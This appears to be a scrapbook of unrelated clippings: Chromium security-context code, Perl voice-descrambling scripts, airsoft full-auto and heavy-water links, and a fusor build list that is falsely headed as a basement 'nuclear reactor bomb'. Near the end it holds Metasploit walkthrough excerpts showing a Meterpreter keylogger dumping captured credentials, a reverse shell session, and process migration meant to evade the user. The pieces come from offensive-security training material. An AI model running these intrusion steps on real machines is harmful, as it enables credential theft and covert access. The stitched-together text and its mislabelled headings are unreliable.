keyboard wrapper migration - fuckin' Keyscore

void Document::setUseSecureKeyboardEntryWhenActive(bool usesSecureKeyboard)
{
    if (m_useSecureKeyboardEntryWhenActive == usesSecureKeyboard)
        return;

    m_useSecureKeyboardEntryWhenActive = usesSecureKeyboard;
    m_frame->selection().updateSecureKeyboardEntryIfActive();
}

bool Document::useSecureKeyboardEntryWhenActive() const
{
    return m_useSecureKeyboardEntryWhenActive;
}

void Document::initSecurityContext(const DocumentInit& initializer)
{
    ASSERT(!getSecurityOrigin());

    if (!initializer.hasSecurityContext()) {
        // No source for a security context.
        // This can occur via document.implementation.createDocument().
        m_cookieURL = KURL(ParsedURLString, emptyString());
        setSecurityOrigin(SecurityOrigin::createUnique());
        initContentSecurityPolicy();
        // Unique security origins cannot have a suborigin
        return;
    }

    // In the common case, create the security context from the currently
    // loading URL with a fresh content security policy.
    enforceSandboxFlags(initializer.getSandboxFlags());
    if (initializer.shouldEnforceStrictMixedContentChecking())
        enforceStrictMixedContentChecking();
    setInsecureRequestsPolicy(initializer.getInsecureRequestsPolicy());
    if (initializer.insecureNavigationsToUpgrade()) {
        for (auto toUpgrade : *initializer.insecureNavigationsToUpgrade())
            addInsecureNavigationUpgrade(toUpgrade);
    }

    if (isSandboxed(SandboxOrigin)) {
        m_cookieURL = m_url;
        setSecurityOrigin(SecurityOrigin::createUnique());
        // If we're supposed to inherit our security origin from our
        // owner, but we're also sandboxed, the only things we inherit are
        // the origin's potential trustworthiness and the ability to
        // load local resources. The latter lets about:blank iframes in
        // file:// URL documents load images and other resources from
        // the file system.
        if (initializer.owner() && initializer.owner()->getSecurityOrigin()->isPotentiallyTrustworthy())
            getSecurityOrigin()->setUniqueOriginIsPotentiallyTrustworthy(true);
        if (initializer.owner() && initializer.owner()->getSecurityOrigin()->canLoadLocalResources())
            getSecurityOrigin()->grantLoadLocalResources();
    } else if (initializer.owner()) {
        m_cookieURL = initializer.owner()->cookieURL();
        // We alias the SecurityOrigins to match Firefox, see Bug 15313
        // https://bugs.webkit.org/show_bug.cgi?id=15313
        setSecurityOrigin(initializer.owner()->getSecurityOrigin());
    } else {
        m_cookieURL = m_url;
        setSecurityOrigin(SecurityOrigin::create(m_url));
    }

    // Set the address space before setting up CSP, as the latter may override
    // the former via the 'treat-as-public-address' directive (see
    // https://mikewest.github.io/cors-rfc1918/#csp).
    if (initializer.isHostedInReservedIPRange()) {
        setAddressSpace(getSecurityOrigin()->isLocalhost() ? WebAddressSpaceLocal : WebAddressSpacePrivate);
    } else {
        setAddressSpace(WebAddressSpacePublic);
    }

    if (importsController()) {
        // If this document is an HTML import, grab a reference to it's master document's Content
        // Security Policy. We don't call 'initContentSecurityPolicy' in this case, as we can't
        // rebind the master document's policy object: its ExecutionContext needs to remain tied
        // to the master document.
        setContentSecurityPolicy(importsController()->master()->contentSecurityPolicy());
    } else {
        initContentSecurityPolicy();
    }

    if (getSecurityOrigin()->hasSuborigin())
        enforceSuborigin(getSecurityOrigin()->suboriginName());

    if (Settings* settings = initializer.settings()) {
        if (!settings->webSecurityEnabled()) {
            // Web security is turned off. We should let this document access every other document. This is used primary by testing
            // harnesses for web sites.
            getSecurityOrigin()->grantUniversalAccess();
        } else if (getSecurityOrigin()->isLocal()) {
            if (settings->allowUniversalAccessFromFileURLs()) {
                // Some clients want local URLs to have universal access, but that setting is dangerous for other clients.
                getSecurityOrigin()->grantUniversalAccess();
            } else if (!settings->allowFileAccessFromFileURLs()) {
                // Some clients do not want local URLs to have access to other local URLs.
                getSecurityOrigin()->blockLocalAccessFromLocalOrigin();
            }
        }
    }

https://code.google.com/p/chromium/codesearch#chromium/src/third_party/WebKit/Source/core/dom/Document.cpp&q=keyboard%20wrapper%20migration&sq=package:chromium&type=cs&l=4935

Voice descrambler

This program descrambles band inverted encrypted transmissions, usually found on VHF/UHF. It uses a NCO (numerical controlled oscillator) to re-produce the originally inverted audio band. Use it only if legally permitted in your country. I assume no responsabilities deriving from its use. Standard disclaimer applies

http://www.dxzone.com/dx16133/voice-descrambler.html

Descrambling the voice inversion scrambler

http://www.windytan.com/2013/05/descrambling-voice-inversion.html

Voice inversion is a method of scrambling radio conversations to render speech nearly unintelligible in ordinary radio receivers. As the name implies, it inverts the audio spectrum of a signal, making the lowest frequencies the highest and vice versa. It is not considered encryption; it's merely a sort of Pig Latin on analogue signals. Several voice scramblers utilize it, like the Selectone ST-20.

Voice inversion is cancelled by reapplying the inversion, i.e. inverting the audio spectrum again. Here I'll present some least-effort digital descrambling methods for the voice inversion scrambler that may be of interest to hobbyist listeners. The examples are written in Perl.

Easy

In a digitally sampled signal, whole-spectrum inversion can be achieved very easily in the time domain by multiplying every other sample by −1. This is equivalent to amplitude modulating aNyquist frequency carrier with the signal; the upper sideband will get inverted and nicely overlaid with the lower because of symmetric folding.

open(IN, "sox scrambled.wav -r 8600 -c 1 -t .s16 -|");
open(OUT,"|sox -r 8600 -c 1 -t .s16 - descrambled.wav");
$n = 1;
 
while (not eof IN) {
  read IN, $a, 2;
  print OUT pack("s",unpack("s",$a) * $n);
  $n *= -1;
}

Because the whole spectrum is inverted, a sampling rate has to be chosen to (approximately) match the signal bandwidth. Slight distortion will still remain, unless the chosen Nyquist frequency perfectly matches the inverted zero frequency of the signal, or the "inversion carrier" as Selectone calls it. But speech will nevertheless be much more intelligible than in the original scrambled signal.

For example, consider a scrambled piece of audio that seems to have its highest frequency components at 4300 Hz. We would need to resample the audio at a rate of 8600 Hz and multiply every other sample by −1 to get intelligible audio.

To make things simpler, the Selectone ST-20B supports eight discrete carrier frequencies, namely 2632, 2718, 2868, 3023, 3196, 3339, 3495, and 3729 Hz, which they claim to be "the most commonly used inversion formats".

Difficult

If resampling is out of the question, we can also multiply the samples with a sine wave oscillating at the seemingly highest scrambled frequency. This will produce two sidebands; the lower will be our descrambled audio and will be conveniently at baseband. The upper sideband contains the inverted signal, but at such a high frequency it should not significantly impede intelligibility. We could improve the audio further by silencing the upper sideband using a lowpass filter.

$fs = 48000; # sample rate
$fc = 3729;  # carrier frequency
$filter = " sinc -$fc"; # optional LP filter
 
$fc = freq($fc);
 
open(IN, "sox scrambled.wav -c 1 -b 16 -e signed -t .raw -|");
open(OUT,"|sox -r $fs -c 1 -b 16 -e signed -t .raw - descrambled.wav".
         $filter);
 
while (not eof IN) {
 
  $acc += $fc;
  $acc -= 65536 if ($acc > 32767);
 
  read(IN,$a,2);
  print OUT pack("s",unpack("s",$a) * sin($acc/32768*3.141592653589793));
}

sub freq { int(.5 + $_[0] * 65536 / $fs); }

A word about split-band scrambling

Some scramblers, like the PCD4440T, use a split-band inversion where the audio is split into two frequency bands that are then inverted separately and combined. The split frequency is user-adjustable. This is not a significant improvement; it would only require us to do the digital deinversion in two parts with different parameters.

Results

And here's a demo of what it sounds like. We begin with a (fake) scrambled message. Then the easy descramble comes on with a 1000 Hz error in the selected sampling rate; then the easy descramble with an error of 300 Hz; and the difficult method with a spot-on carrier frequency and with the upper sideband also audible. In the end, we also filter out the unwanted upper sideband.

Convert a spring airsoft gun to full auto

http://www.instructables.com/id/Convert-a-spring-airsoft-gun-to-full-auto/

HEAVY WATER, D2O : It is extensively used as a moderator in nuclear reactors

Multistage electrolysis of ordinary water containing NaOH gives heavy water. The cell used for electrolysis, contains a cylindrical vessel made of steel as cathode while a perforated cylindrical sheet acts as the anode. The electrolysis is carried out in different stages.

http://www.schoolvideos.in/heavy-water-video/

Deuterium removal from water

What percentage of deuterium might be removed from water after a typical electrolysis procedure? From a post on this site I read that, "In the first stage, NaOHNaOH solution (initially 0.5M0.5M) is subject to electrolysis, until only 132132 of the original volume remains. This increased the original concentration of deuterium by a factor of 1212."
This seems to be, for the electrolyzed hydrogen, an approximate 38%38% decrease from the original concentration. If we assume the original concentration was 150ppm150ppm then after the first pass, we might expect to have 93ppm93ppm in the deuterium reduced hydrogen. If my estimate is valid, may I expect that each successive pass would reduce the deuterium content by a similar percentage?


http://chemistry.stackexchange.com/questions/47189/deuterium-removal-from-water

HOW TO MAKE A NUCLEAR REACTOR BOMB ON THE BASEMENT

Two vacuum pumps suck air out of the central chamber, leaving a near-total vacuum. Loose atoms in here interfere with fusion and lower yield.
The chamber is filled with deuterium and jolted with about 45,000 volts of electricity. A negatively charged grid of thin steel wires attracts the now-positive particles, sometimes causing them to collide.
Colliding particles fuse to form helium-3. The resulting neutron emission is measured, proving that fusion occurred

Here are the minimum required materials:

-A vacuum chamber, preferably in a spherical shape
-A roughing vacuum pump capable of reaching at least 75 microns vacuum
-A secondary high vacuum pump, either a turbo pump or oil diffusion pump
-A high voltage supply, preferably capable of at least 40kv 10ma - Must be negative polarity
-A high voltage divider probe for use with a digital multimeter
-A thermocouple or baratron (of appropriate scale) vacuum gauge
-A neutron radiation detector, either a proportional He-3 or BF3 tube with counting instrumentation, or a bubble dosimeter
-A Geiger counter, preferably a scintillator type, for x-ray detection and safety
-Deuterium gas (can be purchased as a gas or extracted from D2O through electrolysis - it is much easier and more effective to use compressed gas)
-A large ballast resistor in the range of 50-100k and at least a foot long
-A camera and TV display for viewing the inside of the reactor
-Lead to shield the camera viewport
-General engineering tools, a machine shop if at all possible (although 90% of mine was built with nothing but a dremel and cordless drill, the only thing you really can't build without a shop is scratch building the vacuum 
chamber)

to extract deuterium is basicly : producible by electrolyzing ordinary tap water with a freshly-charged car battery

http://www.instructables.com/id/Build-A-Fusion-Reactor/

Remote Power Control For Battery Powered Devices

Thin conductors on both sides of a thin insulator are connected by wires to a remote switch. Slide it between the batteries. It breaks the connection until the switch is turned on.

http://www.instructables.com/id/Remote-Power-Control-For-Battery-Powered-Devices/

malicious Gh0st RAT process

svchost.exe

https://www.offensive-security.com/metasploit-unleashed/keylogging/

Finally, we start the keylogger, wait for some time and dump the output.

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
   tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword

https://www.offensive-security.com/metasploit-unleashed/meterpreter-backdoor/

Using the metsvc backdoor, you can gain a Meterpreter shell at any point.

One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.

First, we exploit the remote system and migrate to the ‘Explorer.exe’ process in case the user notices the exploited service is not responding and decides to kill it.

msf exploit(3proxy) > exploit

[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)

meterpreter > ps

Process list
============

    PID   Name                 Path
    ---   ----                 ----
    132   ctfmon.exe           C:\WINDOWS\system32\ctfmon.exe
    176   svchost.exe          C:\WINDOWS\system32\svchost.exe
    440   VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    632   Explorer.EXE         C:\WINDOWS\Explorer.EXE
    796   smss.exe             \SystemRoot\System32\smss.exe
    836   VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    844   VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    884   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
    908   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
    952   services.exe         C:\WINDOWS\system32\services.exe
    964   lsass.exe            C:\WINDOWS\system32\lsass.exe
    1120  vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
    1136  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1236  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1560  alg.exe              C:\WINDOWS\System32\alg.exe
    1568  WZCSLDR2.exe         C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
    1596  jusched.exe          C:\Program Files\Java\jre6\bin\jusched.exe
    1656  msmsgs.exe           C:\Program Files\Messenger\msmsgs.exe
    1748  spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
    1928  jqs.exe              C:\Program Files\Java\jre6\bin\jqs.exe
    2028  snmp.exe             C:\WINDOWS\System32\snmp.exe
    2840  3proxy.exe           C:\3proxy\bin\3proxy.exe
    3000  mmc.exe              C:\WINDOWS\system32\mmc.exe

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.

Portugal natural gas grid

Portugal's pipeline network grid